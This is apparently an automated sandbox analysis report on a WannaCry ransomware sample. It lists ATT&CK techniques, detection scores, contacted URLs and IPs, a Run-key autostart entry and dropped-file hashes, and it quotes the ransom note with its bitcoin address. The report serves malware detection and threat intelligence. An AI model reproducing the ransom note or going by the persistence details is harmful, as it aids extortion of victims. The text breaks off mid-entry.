| Valid Accounts | Scripting (12) | DLL Side-Loading (1) | DLL Side-Loading (1) | Scripting (12) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (12) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (21) |
| Default Accounts | Native API (21) | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (1) | Obfuscated Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Clipboard Data (1) | Exfiltration Over Bluetooth | Encrypted Channel (22) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Inhibit System Recovery (1) |
| Domain Accounts | Command and Scripting Interpreter (2) | Services File Permissions Weakness (1) | Process Injection (11) | Software Packing (1) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Defacement (1) |
                  Local AccountsAt (Windows)Logon Script (Mac)1
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  NTDS23
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Multi-hop Proxy
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Services File Permissions Weakness
                  1
                  File Deletion
                  LSA Secrets21
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits1
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common11
                  Masquerading
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureExfiltration Over C2 Channel2
                  Proxy
                  Jamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Modify Registry
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc Filesystem1
                  System Owner/User Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                  Process Injection
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories
                  Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Services File Permissions Weakness
                  Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
[Behavior graph: ID 795237, Sample: 2N2jefqo8e.exe, Startdate: 31/01/2023, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 2N2jefqo8e.exe | 100% | Avira | TR/Ransom.JB |
| 2N2jefqo8e.exe | 93% | Virustotal | |
| 2N2jefqo8e.exe | 95% | ReversingLabs | Win32.Ransomware.WannaCry |
| 2N2jefqo8e.exe | 100% | Joe Sandbox ML | |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\@WanaDecryptor@.exe | 100% | Avira | LNK/Runner.VPDJ |
| C:\@WanaDecryptor@.exe | 100% | Avira | TR/FileCoder.724645 |
| C:\@WanaDecryptor@.exe | 100% | Joe Sandbox ML | |
| C:\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\@WanaDecryptor@.exe | 91% | Virustotal | |
| C:\Users\user\AppData\Local\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Desktop\TaskData\Tor\libeay32.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\tor.exe | 0% | ReversingLabs | |
| C:\Users\user\Desktop\TaskData\Tor\zlib1.dll | 0% | ReversingLabs | |
| C:\Users\user\Desktop\taskdl.exe | 89% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Desktop\taskse.exe | 89% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Desktop\u.wnry | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Documents\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\user\Downloads\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\Default\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| C:\Users\Public\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| 45.0.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 16.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 49.2.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 16.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 43.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 43.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 18.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 0.0.2N2jefqo8e.exe.400000.0.unpack | 100% | Avira | TR/Ransom.JB |
| 25.0.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 45.2.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 18.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 7.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 21.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 24.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 50.2.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 29.0.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 38.2.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 37.0.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 49.0.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 25.2.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 7.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 47.0.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 47.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 50.0.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 38.0.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 29.2.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 24.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
| 46.2.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 46.0.@WanaDecryptor@.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1206061 |
| 37.2.taskse.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246228 |
| 21.2.taskdl.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1246154 |
                  No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://386bsd.net | 0% | Avira URL Cloud | safe |
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Avira URL Cloud | safe |
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Avira URL Cloud | safe |
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Virustotal | |
| https://386bsd.net | 0% | Virustotal | |
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Virustotal | |
                  No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | @WanaDecryptor@.exe | true | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://blog.torproject.org/blog/lifecycle-of-a-new-relayError | @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$ | @WanaDecryptor@.exe, 00000019.00000002.6616025428.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975188461.000000000019B000.00000004.00000010.00020000.00000000.sdmp | false | | high |
| https://www.google.com/search?q=how | @WanaDecryptor@.exe | false | | high |
| http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp | true | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://www.zlib.net/D | @WanaDecryptor@.exe, 00000019.00000003.2894051927.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.2893794519.00000000027B1000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip | @WanaDecryptor@.exe | false | | high |
| https://blog.torproject.org/blog/lifecycle-of-a-new-relay | @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B | @WanaDecryptor@.exe, 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp | false | | high |
| https://386bsd.net | taskhsvc.exe, 0000001E.00000003.2944209026.0000000003428000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001E.00000003.2953031017.000000000446D000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 171.25.193.9 | unknown | Sweden | 198093 | DFRI-ASForeningenfordigitalafri-ochrattigheterSE | false |
| 92.205.17.93 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | false |
| 95.130.11.147 | unknown | France | 196689 | DIGICUBE01FR | false |
| 18.18.82.18 | unknown | United States | 3 | MIT-GATEWAYSUS | false |
                                IP
                                127.0.0.1
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:795237
                                Start date and time:2023-01-31 16:10:58 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 21m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:51
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample file name:2N2jefqo8e.exe
                                Detection:MAL
                                Classification:mal100.rans.spyw.evad.winEXE@38/892@0/5
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 99.9% (good quality ratio 74.3%)
                                • Quality average: 59.8%
                                • Quality standard deviation: 38.8%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 89
                                • Number of non-executed functions: 249
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, VSSVC.exe, UsoClient.exe
                                • Excluded IPs from analysis (whitelisted): 20.190.159.0, 40.126.31.71, 20.190.159.2, 20.190.159.23, 20.190.159.71, 20.190.159.75, 40.126.31.73, 20.190.159.68, 2.20.216.252
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, e15275.g.akamaiedge.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wdcpalt.microsoft.com, prda.aadg.msidentity.com, login.live.com, wildcard.weather.microsoft.com.edgekey.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
| Time | Type | Description |
|---|---|---|
| 16:15:28 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run atbiaihkhzu126 "C:\Users\user\Desktop\tasksche.exe" |
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Yara Hits:
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\@WanaDecryptor@.exe, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\@WanaDecryptor@.exe, Author: ReversingLabs
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 96%
                                • Antivirus: Virustotal, Detection: 91%, Browse
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1368
                                Entropy (8bit):7.833229274628152
                                Encrypted:false
                                SSDEEP:24:bkoZAE890LBPHIxKSJhwIKtaJwH5t1wbbZDsFSwrfIr44K+P8/HhIDIp:bkvExLmKGh88Y5fwdWSw8Zpk5IDIp
                                MD5:3A8BA42E6CB4A554D2611C4243655D89
                                SHA1:1AFC3B8998B761F3247FEED62F5BF3288D7364CC
                                SHA-256:6904FA25E0D3F5DC7513443D3EC74FEC62EE2DD2FFC972BF5EF818EB496373A0
                                SHA-512:23D67888B2D87D964E324C1069C768D2F58333ADA53019F4A5BA01E4B31CF62B297B51BE81C6105350B60F51FB10B44004B924E5F7CA1D8F5D6504A7F617B6E4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9658633222462845
                                Encrypted:false
                                SSDEEP:96:ocJ9zbhdetqPaq52m0TjlX+rgDvMSeQV3s82l08EwxUNZo1RRcquaxFj:vzbbe0Pj5OlM6jVs8gpGN2z39xFj
                                MD5:DD35115478B5F07C899D5BDCC061DEE2
                                SHA1:1F6A498AC08D48A83C81C486A775124C5E6946BC
                                SHA-256:5E4AD93033D1230E8AF3553698B1FF5EC7039FEBCC3EA3C03329830F69DD4BA2
                                SHA-512:63962F1E6F8891E2D62014B0030912C959E583F3CD73C8CFFC3B80FDBECF6A9BD2D0F2A7AAD03555DE109C0635E11384EBB813F320080C44A8A2430E04485E55
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9613632611220035
                                Encrypted:false
                                SSDEEP:96:oWRRQwg3dcEYBjywvWe7CgwEgm5WHUiHPulY3tk5+jY/Wr4R6EogmQkx4F6V:7/QhCFv9wDq/iHMYaYE/Y4AFQM4wV
                                MD5:A17FDAE00CEDDB34B552197373C79E7D
                                SHA1:446256E6449BE353B14ED9DFE3EF34E5F81E2304
                                SHA-256:F24BF1784673FDC7DACFFB1810C833A591864F039EF4E9FF2199F4EE08F43416
                                SHA-512:7DB6CA58A85411D7BBC228E83023D135D76A79865A9ABA1CFE269D1A1B3CB2784AE52BA4D77ED56C665E5E5234A8D994406351D0C06CC2403B34C76C332C88C8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):516712
                                Entropy (8bit):7.999587931693368
                                Encrypted:true
                                SSDEEP:12288:+fjtxPusI/Novbz4jhREsuZ93gGjkbGK5frqwXVAUSKNuJzceiU:+f7usxvbQGf93djYGErqAi3xJ9iU
                                MD5:4379E8A892DFDF0132DBD460F3DA2DC0
                                SHA1:E677DB57DB795ADDFC59863F14929A15FA9890BA
                                SHA-256:2832B29DEFA7930A8D5FEF300B6C61AE5167D75CCCB1A5AE4BD5A363483474E0
                                SHA-512:7648C040237CEA8926A4AAA5EC07B5E1BEC7F7D83A2B1BFCA689AE3F2D667F879818C2A5832CEAA3B7BFB7A7BAFA82CE0B3AB72CDF6B426930D754BC25CF162D
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.9724099953514305
                                Encrypted:false
                                SSDEEP:192:tuvAiXVvcSQ6vej+Q4CljqiBUOO7QdNZ2oI:tuvAiXVESf2i2l/BUpcdNZ2oI
                                MD5:066854BE7A95C603A3F56322FAB5AF0D
                                SHA1:017316CA5BBF291D071189A8B080C570EE4DDC91
                                SHA-256:CF02663C8B29425AAD79E34630DFE32429CF1517F13A5CA6FB23A9DFF8D9145B
                                SHA-512:A2B58B673FD1F76D85ADFA81A1EE49F4A263E3B3416EF0A55F0EA9E817E2A2E6A2FA180906575862FB430C2D895E19EF5D35F9977C30AD3C0642CF240855724C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.970189477864432
                                Encrypted:false
                                SSDEEP:192:Yn3L+LZUXc2CHqKzt9OzwYQdXDfAQuElVUzZ8:YnmD2CHqnQ5ll
                                MD5:A8C90DBC139D2144999B27719EBF0F15
                                SHA1:629FF64D81E71F58FCEFA95CC9CE7572A2117453
                                SHA-256:E8E2E583B57B73BF55135FCB8FF0EB87A0F3C10C369EA9F58126B13CE33D0F39
                                SHA-512:346596158AE51F6DD73A09D493F4131A7C3FE2E8BAF8AC52423E004ADF56F9D9C3C287CBD6831F9714EDB3BBF18F397E0C61D288BA2A702B2597CCEEE1EEE3CA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6952
                                Entropy (8bit):7.975707572065335
                                Encrypted:false
                                SSDEEP:192:Qv9Co4tuSlwB92JDGOpoZXjSwr91EPvk9pUtlet:QvI3kmBGOsrTKtlet
                                MD5:E88DDE86FE6A01C2A8F9C085A82AC777
                                SHA1:54FE2D381A3D76E9F0ABB14D189AEFE6554E06FF
                                SHA-256:FACA9B0A539C53CDC269FE4788CDDBB1A6B1A0FEB581814FB9B6693727B5ED29
                                SHA-512:29BE707D46A5AF6C9213C862E0DDEAA2C342B109AC55259219B0791A18A531F7184E65F701F3F340A09D0C7ABE191A42C99862064BD6E4620180F71B0593C580
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):242232
                                Entropy (8bit):7.999101401446999
                                Encrypted:true
                                SSDEEP:6144:GQOK3eUp5ZVcH83Ys62AjjPfv7rXFQvg3VyslQB:GQhBp6H83R62AjjPfv7rXFQQV3QB
                                MD5:184B65FAFBAB73592BA86259A84CE0F9
                                SHA1:A32E59E99D902ADE4E347CA8EF5DB36E56783DDB
                                SHA-256:0B7BDE5628564995A7622B89793A16BBA701F546B68962EFB0093B3B96E5D9A6
                                SHA-512:12B534F1DA57E2B3533DE94EF0B757CF7E5A7A9D240F37F5003F7DB4901FF2A39B02F5280D4BD95FA3EF91D09F16609C1E9456D51A8F30ABF22458C53816D057
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):76360
                                Entropy (8bit):7.997792662915774
                                Encrypted:true
                                SSDEEP:1536:KsqF2AYHp2SIFSFU128vndiHuEusRdY44fqI3qQSHoGq10vQ:KsiYHV3G12yOu2z3IaQ910vQ
                                MD5:24E06A9110A2A0C40D10CAC653EAD0F7
                                SHA1:52A68E5D3A6C812DC5A2C1F582BF67F80A3D8086
                                SHA-256:AA54BBB346444118790FB2EF9584561D47AC548FDB8B9019F532C7BDC9FDEB34
                                SHA-512:525283A80356E899AB10FC1D07401F33E402CBEBD87AE581B370E7E3BB5256448EB44C991355D82398A271DB40B17E5265ADD0A3E167DC005C6EE0D27DCE7FF5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4664
                                Entropy (8bit):7.960784159131869
                                Encrypted:false
                                SSDEEP:96:oA8r8pCRpMqDCMU1CHRccjdZraJriCESoG4LZE/mX6xoVIGn9sSx8:WruCgG40cwbG4CEQ4LimXR9u
                                MD5:D8DD3B60700B22DDAA57FAE8BE94CDD7
                                SHA1:35E8549507C92C920BA0C99D62BBE4FA25E93EBE
                                SHA-256:D0408C9D1318C5817CA57E83007534975C6EF8123F41A45F669CC18822EC8AAB
                                SHA-512:933A8FE1E3C816CADB2E8EE101181EE812626DC30294E8849F1A79D7626B1EBFDC97DC36EC0F445E04B3DCAA7790A9FB6D5167248525483582D8E404488CF290
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6360
                                Entropy (8bit):7.968269376079092
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6760
                                Entropy (8bit):7.9723794854002925
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5240
                                Entropy (8bit):7.958309648726187
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9736
                                Entropy (8bit):7.98117084151071
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4552
                                Entropy (8bit):7.950845170731367
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):277304
                                Entropy (8bit):7.999336732929792
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27000
                                Entropy (8bit):7.99393022209552
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):164584
                                Entropy (8bit):7.998933938468432
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24904
                                Entropy (8bit):7.991995403764266
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):690472
                                Entropy (8bit):7.999754963596077
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1816
                                Entropy (8bit):7.8893863653748175
                                Encrypted:false
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
